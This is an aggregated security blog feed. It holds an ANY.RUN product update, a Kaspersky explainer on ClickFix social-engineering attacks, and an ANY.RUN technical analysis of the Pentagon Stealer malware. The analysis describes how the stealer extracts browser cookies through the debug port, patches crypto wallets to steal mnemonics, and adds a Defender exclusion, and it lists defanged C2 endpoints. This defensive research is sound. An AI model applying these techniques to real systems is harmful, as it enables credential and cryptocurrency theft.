Use passkeys and various two-factor authentication methods wherever possible — preferably through the app. Combining a strong password with secure authentication methods creates a powerful synergy, which significantly enhances protection against unauthorized access to your accounts.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-04-30 14:06:552025-04-30 14:06:55Creating a strong and easy-to-remember password | Kaspersky official blog
April was another busy month for the ANY.RUN team! We continued improving our malware detection capabilities, expanded our behavior signatures, and sharpened threat intelligence, all to make your investigations faster, deeper, and even more precise.
From adding fresh Suricata rules and YARA signatures to detecting new malware behaviors, here’s what’s new at ANY.RUN this month.
Let’s dive in!
Product Updates
Integration of ANY.RUN Services with Your Security Systems via SDK
In April, we’ve announced the release of the ANY.RUN SDK, making it easier than ever to integrate our products directly into your infrastructure.
Security teams can now automate submissions, accelerate workflows, and tailor ANY.RUN’s solutions to fit their existing systems like SIEM, SOAR, or XDR. This gives them faster investigations, fewer manual tasks, and more resources freed up for critical analysis.
By integrating ANY.RUN’s products into the security infrastructure via SDK, you can:
Search IOCs, IOBs, and IOAs across our threat database via TI Lookup
Receive and process network-based IOCs with TI Feeds
The SDK is available for users with the Hunter and Enterprise plans.
With the help of this simple integration, we want to make sure that organizations reduce incident response time, improve detection rates, and build a stronger, more resilient security posture.
How to get started: The SDK is Python-based and includes documentation, libraries, and ready-to-use code samples. Find full instructions on GitHub and PyPI.
Contributions and suggestions from other developers are also welcome! For more info on how to contribute, see our guide.
Test ANY.RUN’s services with 14-day trial to see how they can strengthen your company’s security
New Notifications section displayed inside ANY.RUN
ANY.RUN users will now have access to Notifications directly from the platform interface.
This section is built to keep you informed about the most important updates without cluttering your workflow.
With quick access to key information, your security team can easily stay on top of new capabilities, detection improvements, and emerging threats.
Notifications are short, clear, and actionable, so you can stay focused on your investigations while staying in the loop.
Inside the Notifications section, you’ll find:
Key product updates and new feature announcements
Alerts about critical service improvements
Links to major research reports and threat analyses
Important security advisories from our team
Threat Coverage Updates
In April, we expanded our detection coverage across Android, Windows, and Linux environments with updated rules, behavior signatures, and threat intelligence to support more precise, faster investigations.
Here’s a quick look at what’s been updated:
New Suricata Rules
We added 902 new Suricata rules in April to improve visibility into network-based threats, including malicious domains, phishing infrastructure, and C2 traffic.
These updates enhance detection coverage for various malware families, including miners, stealers, and ransomware.
Behavior Signatures
We introduced 91 new behavior-based signatures to improve detection for malware samples across platforms. These updates include:
These exploits were identified during real-world malware analysis sessions and are now reflected in our detection logic. ANY.RUN continues to monitor and analyze new CVEs to provide fast, actionable insights for defenders.
New YARA Rule Updates
We released 13 new and updated YARA rules to improve static detection and classification, covering both new malware strains and updates to existing detections.
TI Reports get you up to speed on the latest cyber threats targeting businesses
In April, we added two new reports to our Threat Intelligence library, focused on advanced persistent threats (APTs) and coordinated cybercriminal activity. These reports provide fresh insights into recent campaigns, along with actionable tools to support threat hunting, attribution, and detection.
This report analyzes campaigns linked to APT37, EncryptHub, and STORM-1865, combining info from public research and ANY.RUN’s own findings. It includes:
IOC lists and observed TTPs
Related malware samples
TI Lookup queries and YARA rules
Guidance for detecting similar threats in your environment
This overview shows how threat actor activity is identified, analyzed, and traced using ANY.RUN’s tools.
Learn to Track Emerging Cyber Threats
Check out expert guide to collecting intelligence on emerging threats with TI Lookup
Read full guide
Threat Actors Activity Overview 02
This report focuses on recent campaigns associated with PATCHWORK and APT29. It provides:
YARA rules and TI Lookup queries to support detection
IOC collections and sample analysis
Adversary profiles and campaign behavior
Technical breakdowns of malicious files
The report is built to support threat hunters and analysts in tracking high-impact adversaries with greater precision.
About ANY.RUN
ANY.RUN supports over 15,000 organizations across industries such as banking, manufacturing, telecommunications, healthcare, retail, and technology, helping them build stronger and more resilient cybersecurity operations.
With our cloud-based Interactive Sandbox, security teams can safely analyze and understand threats targeting Windows, Linux, and Android environments in less than 40 seconds and without the need for complex on-premise systems. Combined with TI Lookup, YARA Search, and Feeds, we equip businesses to speed up investigations, reduce security risks, and improve team’s efficiency.
From the near-demise of MITRE’s CVE program to a report showing that AI outperforms elite red teamers in spearphishing, April 2025 was another whirlwind month in cybersecurity
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-04-30 07:06:412025-04-30 07:06:41This month in security with Tony Anscombe – April 2025 edition
Attackers are increasingly using the ClickFix technique to infect Windows computers to force users to run malicious scripts manually. The use of this tactic was first seen in the spring of 2024. Since then, attackers have come up with a number of scenarios for its use.
What is ClickFix?
The ClickFix technique is essentially an attempt to execute a malicious command on the victim’s computer relying solely on social engineering techniques. Under one pretext or another, attackers convince the user to copy a long command line (in the vast majority of cases — a PowerShell script), paste it into the system’s Run window, and press Enter, which should ultimately lead to compromising the system.
The attack normally begins with a pop-up window simulating a notification about a technical problem. To fix this problem, the user needs to perform a few simple steps, which boil down to copying some object and executing it through the Run application. However, in Windows 11, PowerShell can also be executed from the search bar for applications, settings, and documents, which opens when you click on the icon with the system’s logo, so sometimes the victim is asked to copy something there.
ClickFix attack – how to infect your own computer with malware in three easy steps. Source
This technique earned itself the name ClickFix because usually the notification contains a button, the name of which is somehow related to the verb “to fix” (Fix, How to fix, Fix it…), which the user needs to click to solve the alleged problem or see instructions for solving it. However, this isn’t a mandatory element — the need to launch some code can be justified by the requirement to check the computer’s security, or, for example, to confirm that the user is not a robot. In this case, the Fix button can be omitted.
An example of instructions for confirming that you’re not a robot. Source
The scheme may differ slightly from case to case, but attackers typically give the victim the following instructions:
click the button to copy the code that solves the problem;
press the key combination [Win] + [R];
press the combination [Ctrl] + [V];
press [Enter].
So what actually happens? The first action (clicking the button to copy the code that solves the problem) copies some script invisible to the user to the clipboard. The second (pressing the key combination [Win] + [R]) opens the Run window, which in Windows is designed to quickly launch programs, open files and folders, and enter commands. In the third (pressing the combination [Ctrl] + [V]), the PowerShell script is pasted into Run window from the clipboard. And finally, with the fourth action (pressing [Enter]), the code is launched with the current user privileges.
As a result of executing the script, malware is downloaded and installed onto the computer — with the specific malicious payload varying from campaign to campaign. Thus, what we get is the user running a malicious script on their own system thereby infecting his own computer.
Typical attacks using the ClickFix technique
Sometimes attackers create their own websites and lure users to them using various tricks. Or they hack existing websites and force them to display a pop-up window with instructions. In other cases similar instructions are delivered under various pretexts via email, social networks, or even through instant-messengers. Here are some typical scenarios of using this technique in attacks:
1. Unable to display the page, need to refresh the browser
A classic scenario in which the visitor doesn’t see the page they expected to and is told they need to install a browser update to display it.
2. Error loading a document on a website
Another standard tactic: the user isn’t allowed to view a certain document in Microsoft Word or PDF format. Instead, they’re shown a notification asking to install a plugin for viewing the PDF or “Word online”.
3. Error opening a document from email
In this case attackers substitute the file format. The victim sees a .pdf or .docx icon, but in reality clicks on the HTML file that opens in the browser. Then everything is similar to the previous case — what are needed are: a plugin, malicious instructions, and the familiar “How to fix” button.
4. Problems with the microphone and camera in Google Meet or Zoom
A more unusual variation of the ClickFix tactic is used on fake Google Meet or Zoom websites. The user receives a link for a video call, but “is not allowed to join” it, because there are problems with their microphone and camera. The message “explains” how to fix it.
5. Prove that you’re not a robot – fake CAPTCHA
Finally, the most curious version of the attack using ClickFix: the site visitor is asked to complete a fake CAPTCHA to prove they’re not a robot. But the required proof is, of course, is to follow the instructions written in the pop-up window.
Prove you’re not a robot – to do this, run a malicious script on your computer. Source
How to protect yourself from ClickFix attacks?
The simplest mechanism for protecting your company from attacks using the ClickFix technique involves blocking the [Win] + [R] key combination in the system — it’s hardly needed at all in the day-to-day work of the typical employee. However, this isn’t a panacea — as we already wrote above, in Windows 11 the script can be launched from the search bar, and some variations of this attack use more detailed instructions in which the user is told how to manually open the Run window.
Therefore, protective measures, of course, should be comprehensive and primarily aimed at training employees. It’s worth conveying to them that if someone seeks any manual manipulations with the system — it’s an extremely alarming sign.
Here are some tips on how to protect your organization’s employees from attacks using ClickFix tactics:
Raise employee awareness of cyberthreats, including new tactics, with specialized training. Organizing such training is easy – just use our automated educational Kaspersky Automated Security Awareness Platform .
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-04-29 22:06:422025-04-29 22:06:42What is ClickFix and how to protect your company | Kaspersky official blog
The current article provides technical analysis of an emerging malware named Pentagon Stealer. The research has been prepared by the analyst team at ANY.RUN.
Key Takeaways
Variants: Exists in Python (AES-encrypted, multi-stage) and Golang (unencrypted, part of attack chains) versions.
Data Theft: Steals browser credentials, cookies, crypto wallet data (Atomic/Exodus), Discord/Telegram tokens, and specific files.
Debug Mode Exploitation: Launches Chromium-based browsers in debug mode to extract unencrypted cookies, bypassing DPAPI encryption for easier data theft.
Crypto Wallet Injection: Replaces app.asar files in Atomic/Exodus wallets with patched versions to steal mnemonics/passwords, using a public proof-of-concept available on GitHub.
Evolution and Campaigns: Spread via typosquatting, later under the names 1312, Acab, Vilsa, and BLX stealer. BLX adds clipboard, screenshot, and Steam/Epic data theft.
C2 Communication: Uses HTTP requests with servers like pentagon[.]cy and stealer[.]cy; BLX uploads to gofile.io, sending links to C2.
Ongoing Threat: Simple but persistent, with new variants showing minor updates, continuing to pose risks.
How We Discovered Pentagon Stealer
In early March of this year, when browsing Public submissions, the ANY.RUN team came across an interesting malware sample written in Golang.
Image 3. Sandbox analyses with the Pentagon tag displayed in TI Lookup
Among the search results, we identified a sandbox analysis of a website hosted on the domain pentagon.cy that featured the admin panel of this malware. Thus, we named it Pentagon Stealer.
Image 4. The admin panel
Exploring the website further, we discovered that there was also a Python-based version of this malicious program, available at pentagon[.]cy/paste?userid=<n>. You can see the page in this sandbox session.
Image 5. The original page containing a dropper script for deploying the first stage of the malware
Considering the lack of public information on the malware and its potential to pose serious threat to our clients, we decided to analyze it and collect essential intel for effective detection of Pentagon Stealer.
Here’s what we’ve found.
Follow along the analysis with ANY.RUN’s Interactive Sandbox and launch your own malware investigations
Let’s start with the Python variant which still can be found on the attackers’ infrastructure to this day. Next, we’ll compare its functionality to that of the previous versions.
Initial Stage: Script Dropper
As seen in the sandbox analysis, the attack begins with a script dropper. Its purpose is to launch python_setup.py encrypted via Fernet using AES in CBC mode.
Image 6. Decrypted script in CyberChef
Use this decryption recipe in CyberChef for decrypting the initial and all the following stages, as the algorithm remains unchanged, only the key changes.
Main Stealer Module
Once we decrypt the payload, we can see the code of the stealer’s main module.
First, it checks whether the directory “%LOCALAPPDATA%/HD Realtek Audio Player” exists on the victim’s computer. If not, it creates it and continues execution. This is a technique used by the malware to check if the machine has already been infected.
The malware then begins to steal a variety of data, including:
Login credentials, cookies, and extension data from Chromium-based browsers and cookie data from Mozilla Firefox
Image 7. Code for stealing Firefox cookies
Data from apps for managing cryptocurrency wallets
Discord tokens and Telegram authorization data
Files with specific names and extensions from user directories
There are also two actions performed by the malware that stand out from the rest and are worth a more detailed analysis:
To steal cookies, Pentagon launches Chromium-based browsers in debug mode.
The malware also replaces app.asar files used by Exodus and Atomic wallets.
Let’s take a closer look at them.
Injection into Atomic and Exodus Crypto Wallets
The stealer can inject into two popular cryptocurrency wallet management applications: Atomic and Exodus. Both use Electron, which stores JavaScript code in app.asar files.
The injection performed by Pentagon involves replacing these files with attacker-patched versions.
The image above shows the stealer overwriting the app.asar content of both applications with data from its command server. Additionally, a loguuid is written to the LICENSE files in both cases, which allows the attackers to identify the victim.
Image 8. Code for injecting into Atomic and Exodus
But why did they overwrite app.asar and what specific changes were made?
Since .asar files are archives containing .js files, we can unpack them with 7-Zip with a special plugin to analyze the code. As expected, the goal here is to obtain the user’s mnemonic and password. The images below illustrate how this is done.
Image 9. Collection of the user data in Atomic Wallet
The images show how a packet, containing the user’s password, mnemonic, and wallet type, is formed. One of the headers includes the loguuid.
Image 10. Collection of the user data in Exodus Wallet
It’s worth noting that the attacker clearly used Inject_PoC in this part of the operation, as indicated by the code similarity.
For example, the Atomic Wallet section from the PoC repository looks like this:
Image 11. The attacker reused code for injecting into Atomic
The similarity is evident. The attacker just simplified the packet. In the case of Atomic, even the application version matches.
For Exodus, the code segment from the repository looks like this:
Image 12. Inject_PoC code for injecting into Exodus
Launching Browsers in Debug Mode
This is a common technique for obtaining cookies in unencrypted form.
In short, this method causes some Chromium-based browsers to provide cookies in plaintext. If the standard method of extracting cookies from files were used, they would need to be decrypted, which can be problematic.
These browsers use the DPAPI mechanism to protect sensitive data. If the malware is executed in the session of a user whose password was used in the encryption process, a call to the UnProtect() function may be enough to decrypt the data. Otherwise, decryption can be extremely difficult. In addition, the task may be complicated, for example, by the Application-Bound (App-Bound) Encryption method used in the latest versions of Chrome.
Here’s how debugging helps to get cookies in an easier way:
The browser is launched with a specified debugging port (default 9222).
A GET request is made to http://localhost:9222/json, which returns a JSON response containing webSocketDebuggerUrl.
Commands can be sent to this URL using the WebSocket protocol.
Using the Network.getAllCookies command, the desired cookies are obtained, already decrypted by the browser.
Image 13. Code for launching browsers in debug mode
This method explains the unusual behavior of relaunching browser, which piqued our interest when we first came across Pentagon’s sample.
Decryption and Transition to the Next Stage: runpython.py
The final part of the stealer module is the decryption and launch of the next stage, runpython.py.
Image 14. Code for initializing the next stage
Once we decrypt the payload, we can see the command used.
Image 15. Decrypted command for the next stage launch
Following the URL inside the command reveals the dropper script used for launching runpython.py.
Image 16. Runpython.py dropper script
Yet Another Stage: Functionality of runpython.py
Inside runpython.py, we can see the following bat-file:
Image 17. Bat-file loader of the next stage
It follows this algorithm:
Checks if it has access to system files, indicating admin rights.
If not, creates a temporary VBS script to relaunch the current BAT script with admin rights.
Creates the directory C:WindowsWinEmptyfold as an infection indicator.
Runs PowerShell to add a Windows Defender exclusion, preventing it from scanning the C:/ drive.
Downloads the next stage from a remote resource and executes it as RuntimeBroker.exe.
Deletes files and directories used by the stealer.
In all samples we have analyzed (example), Pentagon Stealer exclusively dropped Purecrypter which then deployed a miner. However, it is possible that there can be alternative payloads.
Attack Chain and Timeline of Python-based Pentagon Stealer
Pentagon Stealer’s chain of attack can be represented in the following way:
Let’s now take a look at Pentagon’s development timeline and see what methods the attackers used for delivering it to victims.
March 2024: Typosquatting Campaign
One of the earliest campaigns we came across in our research involved masking Pentagon as popular PyPI Python packages using a technique called “typosquatting”.
In this version, the malware couldn’t steal Web Data from Chromium browsers, unencrypted cookies via browser debugging, or Telegram data. Additionally, the protocol for interacting with the C2 server was more primitive: all information was written to files, which were then sent to funcaptcha[.]ru/delivery.
September 2024: 1312 Stealer
In another campaign, the stealer was available under the name 1312 Stealer. ANY.RUN’s Public submissions help us track changes in the admin panel.
1312’s new functionality included stealing Web Data from Chromium-based browsers and Telegram tdata. Communication with the C2 server changed: passwords were sent to 1312services[.]ru/pw, Web Data to 1312services[.]ru/webdata, and everything else to 1312services[.]ru/delivery.
Now, it’s time to dissect the latest version of the stealer, which is currently being actively distributed. It kept the functionality of the Python version, but with some improvements described below.
Image 21. Detect It Easy identified the sample as being written in Go
Unlike its Python counterpart, this variant does not download subsequent stages independently. Instead, it is used as one of the modules in the attack chain, as shown by sandbox analysis. Learn more about this in the ‘Infection Methods’ section.
Upon launch, the stealer hides its console window and checks for the directory %LOCALAPPDATA%Realtek HD Audio Service on the victim’s computer, indicating previous execution.
Learn to analyze cyber threats
Follow along a detailed guide to using ANY.RUN’s Interactive Sandbox for malware and phishing analysis
Read full guide
It then begins collecting information as described. The main improvement, unique to the Golang version, is the ability to steal data not only from Firefox but also from other Gecko-based browsers, including:
Zen
SeaMonkey
Waterfox
K-Meleon
Thunderbird
IceDragon
Cyberfox
BlackHaw
Pale Moon
Mercury
Librewolf
The malware now can steal passwords from these browsers, in addition to cookies. The rest of the functionality remains unchanged, though the programming language has been altered.
C2 Communication Protocol
Regarding interaction with the C2 server, recent malware versions use two domains: stealer[.]cy and pentagon[.]cy. The communication method is identical in both the latest Python and Golang versions.
Image 22. How Pentagon Stealer communicate with C2
The stealer and command server communicate via HTTP requests. Upon log creation (create_log()), the victim sends the number of collected passwords, cookies, Discord tokens, and names of all collected files. The server responds with either a rejection or a log_uuid, which is subsequently used as the victim’s identifier, replacing the previously hardcoded uuid.
Image 23. POST request to pentagon[.]cy/create_log shown in ANY.RUN
Image 24. C2 response
Infection Methods
Notably, the Golang version of the stealer lacks any encryption of its code and strings, which is unusual since each subsequent stage of its Python counterpart is encrypted using AES. This suggests the possible existence of a dropper or loader.
A search in TI Lookup involving the stealer yielded the following analysis.
Here is the sample’s execution chain:
Image 25. Attack chain involving the Golang version
The initial attack stage involved running an NSIS installer named BlumBot.exe. This installer executed a VBS script that displayed a familiar message, “vcruntime140.dll is missing from your computer”. It then proceeds to launch the next stage, Installer.exe.
Notably, reverse-engineering BlumBot.exe was not necessary to uncover this. A tool capable of unpacking NSIS installers and extracting the .nsi script was enough. In our investigation, we used NanaZip.
NSIS installer in NanaZip:
Image 26. NSIS installer in NanaZip
Fragment of the .nsi script:
Image 27. Piece of .nsi script
Installer.exe is a loader written in Golang. Its sole purpose is to download and execute two files, ByPass.exe and Main.exe, from biteblob[.]com, and then send a Telegram message confirming successful execution.
Following this, the stealer and a second module, which is actually a miner, are executed.
This is just one example of how Pentagon Stealer is used. In Public Submissions, you can frequently observe samples of various malware using this stealer as one stage in an attack chain.
Further Evolution of Pentagon Stealer
As mentioned, this malware has appeared under various names, although its core functionality remains unchanged, with only minor logical modifications. This trend continues today.
For instance, we recently discovered samples of a stealer with identical code but named BLX Stealer, as indicated by code strings and description in this article.
The attack consists of multiple stages, but we focus on the stealer itself.
This version is written in Python, like its predecessors, but is packaged into an executable using PyInstaller. With pyinstxtractor and pylingual.io, we successfully reconstructed the stealer’s source code for analysis.
Regarding functionality, this version did not branch out from the latest Pentagon Stealer, as it lacks crypto-wallet injection and data theft from Gecko-based browsers other than Mozilla Firefox.
Yet, it has unique features not previously observed:
Extracts clipboard content
Captures screenshots
Reads system information
Retrieves additional Discord user information, including two-factor authentication status, Nitro subscription type, and user badges
Steals Steam and Epic Games account data
The communication protocol with the C2 server is also noteworthy. The stealer does not send files directly; instead, it uploads them to gofile.io and then sends the access link to http[:]//<ip>/tgproxy/{USERID}/.
Image 28. Example of C2 communication
We also discovered a sample with the capability to steal NordVPN configuration files (user.config).
Conclusion
Pentagon Stealer cannot be considered malware capable of complex targeted attacks due to its simplicity. Its development history shows that authors often merely changed the domain, leaving the functionality intact. However, a year has passed since its first mention, and it has undergone modifications, with the most significant changes occurring this year. The story is far from over, as new, more complex versions continue to emerge, albeit from different authors.
IOCs and TTPs
MITRE ATT&CK
Tactics
Techniques
Description
TA0002: Execution
T1059.001: Command and Scripting Interpreter: PowerShell
Disables disk C: scanning using Microsoft Defender in the Python version
T1059.003: Command and Scripting Interpreter: Windows Command Shell
Executes a .bat file to download the next stage in the Python version
T1059.005: Command and Scripting Interpreter: Visual Basic
Launches a .vbs script to escalate privileges in the Python version
TA005: Defense Evasion
T1140: Deobfuscate/Decode Files or Information
Decrypts Python stages using Fernet
TA0006: Credential Access
T1555.003: Credentials from Web Browsers
Steals passwords from various browsers
T1539: Steal Web Session Cookie
Steals cookies from various browsers
TA0009: Collection
T1005: Data from Local System
Collects files with specific names and extensions from user directories
TA0011: Command and Control
T1071.001: Application Layer Protocol
Sends collected data to the command server
T1659: Content Injection
Injects custom JavaScript code into cryptocurrency management software
TA0040: Impact
T1657: Financial Theft
Steals credentials from cryptocurrency management software
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-04-29 12:06:562025-04-29 12:06:56Pentagon Stealer: Go and Python Malware with Crypto Theft Capabilities